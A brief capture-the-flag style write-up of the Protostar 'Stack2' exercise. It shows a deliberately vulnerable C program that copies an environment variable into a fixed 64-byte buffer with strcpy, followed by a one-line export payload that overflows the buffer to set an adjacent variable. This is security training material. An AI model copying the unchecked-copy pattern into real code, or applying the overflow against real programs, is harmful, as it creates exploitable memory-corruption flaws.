# Stack2

## Source Code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}
```

## Challenge

In this challenge the value of environment variable `GREENIE` is being copied to `buffer` and hence we need to set `GREENIE` environment variable with out playload that will overflow the `buffer` and will modify the value of `modified` to `0x0d0a0d0a` so this can be done using export statement along with little python magic.

```export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"````

AND Stack 2 id completed